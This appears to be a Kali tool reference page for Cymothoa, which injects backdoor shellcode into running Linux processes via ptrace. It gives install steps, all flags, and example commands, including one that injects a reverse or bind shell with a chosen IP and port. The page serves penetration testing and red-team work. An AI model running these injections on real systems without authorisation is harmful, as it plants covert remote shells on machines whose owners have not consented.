Exploitationbackdoorshellcodeinjectionptracestealth

Cymothoa

Cymothoa is a stealth backdooring tool that injects backdoor shellcode into an existing process. It uses the ptrace library to manipulate and infect processes on *nix systems.

Description

Cymothoa enables stealthy backdoors by injecting shellcode into running processes without creating new detectable processes. This makes it useful for post-exploitation scenarios where maintaining persistence discreetly is critical. The tool targets memory regions with specific permissions, ensuring the shellcode executes reliably within the host process.

Use cases include red team operations, penetration testing, and research into process injection techniques. It supports various shellcode payloads, such as reverse shells and bind shells, configurable via command-line arguments. Cymothoa is particularly effective on Linux systems due to ptrace availability.

The tool includes companion utilities like bgrep for binary pattern searching and udp_server for UDP-based interactions with certain payloads.

How It Works

Cymothoa leverages the ptrace library to attach to a target process by PID, then injects shellcode into a memory region with 'r-xp' permissions (default /lib/ld). It allocates persistent memory in 'rw-p' regions for data storage. Payload execution can use threading, forking, or alarm scheduling, with options to customize behavior like timers, IP/port binds, and authentication.

Installation

bash

sudo apt install cymothoa

Flags

-pprocess pid

-sshellcode number

-lmemory region name for shellcode injection (default /lib/ld), search for "r-xp" permissions

-mmemory region name for persistent memory (default /lib/ld), search for "rw-p" permissions

-hprint this help screen

-Slist available shellcodes

-ffork parent process

-Fdon't fork parent process

-bcreate payload thread (probably you need also -F)

-Bdon't create payload thread

-wpass persistent memory address

-Wdon't pass persistent memory address

-ause alarm scheduler

-Adon't use alarm scheduler

-jset timer (seconds)

-kset timer (microseconds)

-xset the IP

-yset the port number

-rset the port number 2

-zset the username (4 bytes)

-oset the password (8 bytes)

-cset the script code (ex: "#!/bin/sh\nls; exit 0")

Examples

Print the help screen showing usage and options

cymothoa -h

List available shellcodes

cymothoa -S

Basic usage: inject shellcode number into process PID using default memory regions

cymothoa -p <pid> -s <shellcode_number>

Start UDP server on specified port for Cymothoa (usage: udp_server port)

udp_server port

Binary grep to search for hex patterns in files or paths

bgrep <hex> [<path> ...]

Inject shellcode with custom IP and port for reverse/bind shell

cymothoa -p <pid> -s <shellcode_number> -x <IP> -y <port>

Inject shellcode with forking and threading enabled

cymothoa -p <pid> -s <shellcode_number> -f -b

Updated 2026-04-16kali.org ↗